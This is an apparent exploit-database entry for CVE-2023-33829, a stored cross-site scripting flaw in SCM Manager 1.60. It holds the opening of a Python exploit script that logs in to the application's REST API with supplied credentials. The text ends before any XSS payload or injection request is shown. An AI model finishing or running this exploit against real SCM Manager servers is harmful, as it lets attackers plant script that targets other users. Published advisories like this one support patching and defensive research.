Exploits / Vulnerability Discovered : 2023-05-25 | Type : webapps | Platform : multiple
This exploit / vulnerability, SCM Manager 1.60 Cross-Site Scripting Stored (Authenticated), is for educational purposes only; if you use it, you do so at your own risk!
import argparse
import sys

import requests

# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", required=True, help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", required=True, help="password of the user")
args = parser.parse_args()
# Credentials (read from the parsed arguments rather than fixed sys.argv positions,
# so the options work in any order and with their long forms)
user = args.user
password = args.password
# Global Variables
main_url = "http://localhost:8080/scm"  # Change URL if necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"
# Create a session
session = requests.Session()
# Credentials to send
post_data = {
    'username': user,  # change if you have any other user with write permissions
    'password': password  # change if you have any other user with write permissions
}
# Log in; the session object keeps the authentication cookie for later requests
r = session.post(auth_url, data=post_data)
if r.status_code == 200:
    print("[+] Authentication successful")
else:
    print("[-] Failed to authenticate")
    sys.exit(1)